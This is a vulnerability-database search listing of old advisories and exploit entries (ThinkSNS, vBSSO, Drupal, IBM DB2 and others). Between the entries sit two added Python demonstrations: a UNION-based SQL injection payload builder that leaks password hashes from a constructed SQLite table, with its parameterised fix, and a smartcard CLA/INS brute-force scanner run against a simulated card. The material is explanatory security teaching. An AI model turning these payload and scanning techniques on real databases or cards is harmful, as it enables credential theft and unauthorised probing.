Lucene search

2291 matches found

seebug.org (added 2015/02/16)

ThinkSNS defense-bypass approach (union select: a truly unrestricted SQL injection)

Brief description: ThinkSNS defense-bypass approach, union select, a truly unrestricted SQL injection. Details: from our analysis, %00 can be used to bypass the filtering globally:

    public function shareFeed() {
        // read the submitted values
        $post = $_POST;
        // security filtering
        foreach ($post as $key => $val) {
            $post[$key] = t($post[$key]);
        }
        // filter the content field
        $post['body'] = filter_keyword($post['body']);
        // check whether the resource has been deleted
        if (empty($post['curid'])) {
            $map['feed_id'] = $post['sid'];
        } else ...

AI score: 7.1. Exploits: 0.
Exploit DB (added 2015/02/13)

WordPress Plugin Webdorado Spider Event Calendar 1.4.9 - SQL Injection

Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 SQL Injection
Date: 2015-02-12
Exploit Author: Mateusz Lach
Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip...

AI score: 7.4. Exploits: 0.
exploitpack (added 2015/01/20)

vBulletin vBSSO Single Sign-On 1.4.14 - SQL Injection

vBulletin vBSSO Single Sign-On 1.4.14 - SQL Injection. Exploit Title: vBulletin vBSSO Single Sign-On <= 1.4.15. This plugin is vulnerable to SQL injection in the /vbsso/avatar.php file, in the fetchUserinfo function. It requires a big UNION ALL SELECT query and commenting out the LIMIT function of...

AI score: 0.2. Exploits: 0.
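The vBSSO entry above describes the general shape of a UNION-based injection: the attacker's SELECT has to match the original column count, and the original query's trailing LIMIT has to be commented out or the database applies it to the whole compound result. The following is an added example, not code from the vBSSO exploit or the plugin; it runs the technique against a constructed in-memory SQLite schema (the `avatar` and `user` tables, their columns and rows are all assumptions) and shows the vulnerable concatenation beside the bound-parameter fix.

```python
import sqlite3

# Constructed in-memory schema standing in for the target application: a
# lookup that is meant to return at most one row, plus a table the attacker
# actually wants to read. Nothing here is vBSSO's real schema.
SETUP_SQL = """
CREATE TABLE avatar (userid INTEGER, filename TEXT);
INSERT INTO avatar VALUES (1, 'alice.png'), (2, 'bob.png');
CREATE TABLE user (userid INTEGER, username TEXT, password TEXT);
INSERT INTO user VALUES (1, 'alice', 'hash_a'), (2, 'bob', 'hash_b'),
                        (3, 'admin', 'hash_admin');
"""


def connect():
    db = sqlite3.connect(":memory:")
    db.executescript(SETUP_SQL)
    return db


def fetch_avatar_vulnerable(db, userid):
    """Concatenates the caller-controlled value into the statement, the same
    class of bug the advisory describes. The trailing LIMIT 1 looks like it
    caps the result at one row, but it is only text after the injection point."""
    sql = "SELECT filename FROM avatar WHERE userid = " + str(userid) + " LIMIT 1"
    return [row[0] for row in db.execute(sql)]


def fetch_avatar_fixed(db, userid):
    """Bound parameter: the value is never parsed as SQL, so a payload simply
    fails to match any row."""
    sql = "SELECT filename FROM avatar WHERE userid = ? LIMIT 1"
    return [row[0] for row in db.execute(sql, (userid,))]


def union_payload(table, columns, comment_out_limit=True):
    """Build the UNION ALL SELECT tail.

    The appended SELECT must have exactly as many columns as the original
    query (one here), so several wanted columns are concatenated into one
    string. A trailing '-- ' turns the original 'LIMIT 1' into a comment; with
    the LIMIT still live, SQL applies it to the whole compound SELECT and
    only one attacker row comes back per request."""
    packed = " || ':' || ".join(columns)
    tail = "0 UNION ALL SELECT " + packed + " FROM " + table
    return tail + " -- " if comment_out_limit else tail


def demo():
    """Returns (rows with LIMIT commented out, rows with LIMIT left in,
    rows from the parameterised query)."""
    db = connect()
    wanted = ["username", "password"]
    leak = fetch_avatar_vulnerable(db, union_payload("user", wanted))
    clipped = fetch_avatar_vulnerable(
        db, union_payload("user", wanted, comment_out_limit=False))
    safe = fetch_avatar_fixed(db, union_payload("user", wanted))
    return leak, clipped, safe


if __name__ == "__main__":
    leak, clipped, safe = demo()
    print("LIMIT commented out:", leak)
    print("LIMIT still live:   ", clipped)
    print("bound parameter:    ", safe)
```

With the comment in place the injected query returns every `user` row; without it the same payload yields a single row per request, which is the restriction the exploit text is working around. The bound-parameter version returns nothing for the payload because the whole string is compared as a value, not parsed as SQL.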
CNVD (added 2015/01/07)

Microsoft Dynamics CRM Cross-Site Scripting Vulnerability

Microsoft Dynamics CRM is a fully integrated customer relationship management (CRM) system. A cross-site scripting vulnerability exists in Microsoft Dynamics CRM 2013 SP1. Because the "/Biz/Users/AddUsers/SelectUsersPage.aspx" script fails to adequately filter user-supplied input, a remot...

AI score: 6.2. Exploits: 0, References: 1.
OSV (added 2014/12/10 3:59 p.m.)

DEBIAN-CVE-2014-8101

The RandR extension in XFree86 4.2.0, X.Org X Window System (aka X11 or X) X11R6.7, and X.Org Server (aka xserver and xorg-server) before 1.16.3 allows remote authenticated users to cause a denial of service (out-of-bounds read or write) or possibly execute arbitrary code via a crafted length or index...

CVSS: 6.5, AI score: 7.2, EPSS: 0.01269. Exploits: 0, References: 1.
Kitploit (added 2014/12/09 2:34 a.m.)

THC-SmartBrute - Finds undocumented and secret commands implemented in a smartcard

This tool finds undocumented and secret commands implemented in a smartcard. An instruction is divided into Class (CLA), Instruction Number (INS) and the parameters or arguments (P1, P2, P3). THC-SMARTBRUTE iterates through all the possible values of CLA and INS to find a valid combination. Furthermore...

AI score: 7.5. Exploits: 0.
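The CLA/INS sweep the THC-SmartBrute entry describes, as an added example that is not the tool's own code. It classifies each probe by the ISO/IEC 7816-4 status word the card returns: 6E00 (class not supported) and 6D00 (instruction not supported) mean "nothing here", while any other answer, including wrong-length (6700) or wrong-parameter (6A86) errors, proves a handler exists for that CLA/INS pair. The `SimulatedCard` and its handler table are constructed so the scan runs offline; against real hardware its `transmit` would be replaced by the reader's call (pyscard's `connection.transmit`, which returns data plus SW1 and SW2).

```python
# Status words (SW1 SW2) from ISO/IEC 7816-4 used to classify each probe.
SW_OK = 0x9000
SW_WRONG_LENGTH = 0x6700
SW_WRONG_P1P2 = 0x6A86
SW_INS_NOT_SUPPORTED = 0x6D00
SW_CLA_NOT_SUPPORTED = 0x6E00


def build_apdu(cla, ins, p1=0, p2=0, data=b"", le=None):
    """Command APDU: CLA INS P1 P2 [Lc data] [Le] (short-length encoding)."""
    apdu = bytes([cla, ins, p1, p2])
    if data:
        apdu += bytes([len(data)]) + data
    if le is not None:
        apdu += bytes([le])
    return apdu


def candidate_ins():
    """INS values worth sending. Under the T=0 protocol the card echoes INS as
    a procedure byte, so INS values 6X and 9X are reserved and never valid
    instruction codes (ISO/IEC 7816-3)."""
    return [ins for ins in range(256) if (ins & 0xF0) not in (0x60, 0x90)]


class SimulatedCard:
    """Constructed stand-in for a card in a reader, so the scan runs offline.
    It accepts CLA 0x00 and 0x80, implements a few instructions (assumed
    table), and answers everything else with the error words a real card uses."""
    HANDLERS = {
        (0x00, 0xA4): SW_WRONG_P1P2,    # SELECT exists but wants real P1/P2
        (0x00, 0xB0): SW_OK,            # READ BINARY
        (0x00, 0xCA): SW_WRONG_P1P2,    # GET DATA
        (0x80, 0x50): SW_WRONG_LENGTH,  # proprietary command expecting data
    }

    def __init__(self):
        self.sent = 0

    def transmit(self, apdu):
        self.sent += 1
        cla, ins = apdu[0], apdu[1]
        if cla not in (0x00, 0x80):
            return SW_CLA_NOT_SUPPORTED
        return self.HANDLERS.get((cla, ins), SW_INS_NOT_SUPPORTED)


def scan(card):
    """Walk CLA x INS and keep every pair the card did not reject outright.
    A wrong-length or wrong-parameter answer still proves a handler exists;
    the exact P1/P2/Lc can be brute-forced afterwards."""
    found = []
    for cla in range(0xFF):               # 0xFF is not a valid CLA (7816-4)
        probe = card.transmit(build_apdu(cla, 0x00))
        if probe == SW_CLA_NOT_SUPPORTED:
            continue                      # whole class rejected: skip its INS loop
        for ins in candidate_ins():
            sw = card.transmit(build_apdu(cla, ins))
            if sw not in (SW_CLA_NOT_SUPPORTED, SW_INS_NOT_SUPPORTED):
                found.append((cla, ins, sw))
    return found


if __name__ == "__main__":
    card = SimulatedCard()
    for cla, ins, sw in scan(card):
        print("CLA %02X INS %02X -> SW %04X" % (cla, ins, sw))
    print("APDUs sent:", card.sent)
```

Probing each class once before looping over INS is what keeps the sweep to a few hundred APDUs instead of 65536; on a real card, a class that answers 6E00 to one instruction answers it to all of them.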
NVD (added 2014/12/08 4:59 p.m.)

CVE-2014-9346

Multiple cross-site scripting (XSS) vulnerabilities in the Hierarchical Select module 6.x-3.x before 6.x-3.9 for Drupal allow remote authenticated users with certain permissions to inject arbitrary web script or HTML via vectors related to the (1) taxonomy term title for instances with Save term...

CVSS: 3.5, AI score: 5.5, EPSS: 0.00152. Exploits: 0, References: 4.
Prion (added 2014/12/08 4:59 p.m.)

Cross site scripting

Multiple cross-site scripting (XSS) vulnerabilities in the Hierarchical Select module 6.x-3.x before 6.x-3.9 for Drupal allow remote authenticated users with certain permissions to inject arbitrary web script or HTML via vectors related to the (1) taxonomy term title for instances with Save term...

CVSS: 3.5, AI score: 5.7, EPSS: 0.00152. Exploits: 0, References: 4, Affected software: 1.
CVE (added 2014/12/08 4:00 p.m.)

CVE-2014-9346

The CVE records multiple XSS vulnerabilities in the Drupal Hierarchical Select module (6.x-3.x) prior to 6.x-3.9. The issues allow remote authenticated users with certain permissions to inject arbitrary script/HTML via (1) the taxonomy term title when Save term lineage is enabled and (2) the entity type ...

CVSS: 3.5, AI score: 5.5, EPSS: 0.00152. Exploits: 0, References: 4, Affected software: 1.
Cvelist (added 2014/12/08 4:00 p.m.)

CVE-2014-9346

Multiple cross-site scripting (XSS) vulnerabilities in the Hierarchical Select module 6.x-3.x before 6.x-3.9 for Drupal allow remote authenticated users with certain permissions to inject arbitrary web script or HTML via vectors related to the (1) taxonomy term title for instances with Save term...

AI score: 5.5, EPSS: 0.00152. Exploits: 0, References: 4.
Drupal (added 2014/12/03)

SA-CONTRIB-2014-117 - Hierarchical Select - Cross Site Scripting (XSS)

The Hierarchical Select module provides a "hierarchical_select" form element, which is a greatly enhanced way of letting the user select items in a taxonomy. The module does not sanitize some of the user-supplied data before displaying it, leading to two Cross Site Scripting (XSS) vulnerabilities...

CVSS: 3.5, AI score: 5.9, EPSS: 0.00152. Exploits: 0, References: 11.
Packet Storm (added 2014/11/19)

Snowfox CMS 1.0 Open Redirect

Snowfox CMS v1.0 'rd' Parameter Open Redirect Vulnerability
Vendor: Globiz Solutions
Product web page: http://www.snowfoxcms.org
Affected version: 1.0
Summary: Snowfox is an open source Content Management System (CMS) that allows your website users to create and share content based on permission...

AI score: 7.4. Exploits: 0.
Tenable Nessus (added 2014/11/14)

IBM DB2 9.7 < Fix Pack 10 Multiple Vulnerabilities

According to its version, the installation of IBM DB2 9.7 running on the remote host is affected by the following vulnerabilities:
- An input-validation error exists related to handling of the 'ALTER MODULE' statement that allows buffer overflows. (CVE-2014-3094)
- An error exists related to handling...

CVSS: 8.5, AI score: 7.1, EPSS: 0.13382. Exploits: 0, References: 12.
OSV (added 2014/11/10)

UBUNTU-CVE-2014-7207

A certain Debian patch to the IPv6 implementation in the Linux kernel 3.2.x through 3.2.63 does not properly validate arguments in ipv6_select_ident function calls, which allows local users to cause a denial of service (NULL pointer dereference and system crash) by leveraging (1) tun or (2) macvtap devic...

CVSS: 4.9, AI score: 7, EPSS: 0.00087. Exploits: 0, References: 6.
seebug.org (added 2014/10/27)

TinyRise: email spoofing allows resetting anyone's password, plus back-end SQL injection

Brief description: TinyRise: email spoofing allows resetting anyone's password, plus back-end SQL injection. Details: simple.php:

    public function forgetact() {
        $email = Filter::sql(Req::args('email'));
        $model = $this->model->table('user');
        $obj = $model->where("email = '" . $email . "'")->find();
        if (!empty($obj)) {
            $model = $this->model->table('resetpassword');
            $obj = $model->where("email =...

AI score: 7. Exploits: 0.
Packet Storm (added 2014/09/23)

xcode-select 13.4.0 Buffer Overflow

Exploit Title: xcode-select - buffer overflow
Description: xcode-select controls the location of the developer directory used by xcrun(1), xcodebuild(1), cc(1), and other Xcode and BSD development tools.
Date: Tuesday 23 2014
Exploit Author: Juan Sacco
Vendor Homepage: https://developer.apple.com...

AI score: 0.7. Exploits: 0.
Tenable Nessus (added 2014/09/09)

IBM DB2 10.5 < Fix Pack 4 Multiple Vulnerabilities

According to its version, the installation of IBM DB2 10.5 running on the remote host is affected by the following vulnerabilities:
- An error exists related to JavaScript Object Notation (JSON-C) handling, string parsing, and the hash function that allows denial of service attacks. (CVE-2013-6371) ...

CVSS: 8.5, AI score: 7.9, EPSS: 0.13382. Exploits: 0, References: 10.
Prion (added 2014/09/04 10:55 a.m.)

Code injection

The SQL engine in IBM DB2 9.5 through FP10, 9.7 through FP9a, 9.8 through FP5, 10.1 through FP4, and 10.5 before FP4 on Linux, UNIX, and Windows allows remote authenticated users to cause a denial of service (daemon crash) via a crafted UNION clause in a subquery of a SELECT statement...

CVSS: 3.5, AI score: 7.2, EPSS: 0.01272. Exploits: 0, References: 11, Affected software: 1.
seebug.org (added 2014/07/01)

Joomla Component (com_equipment) SQL Injection Vulnerability

No description provided by source.
Exploit Title: Joomla com_equipment SQL Injection Vulnerability
Date: 16 - 8 - 2010
Author: Forza-Dz
Vendor: http://joomlaequipment.com/
Version: All Versions
Tested on: Win Sp2 and Mac
Dork = inurl:com_equipment
--- SQL Injection Vulnerability --- SQL...

AI score: 7.1. Exploits: 0.
seebug.org (added 2014/07/01)

Irokez CMS 0.7.1 - Remote SQL Injection Vulnerability

No description provided by source. Irokez 0.7.1 SQL injection...

AI score: 7.1. Exploits: 0.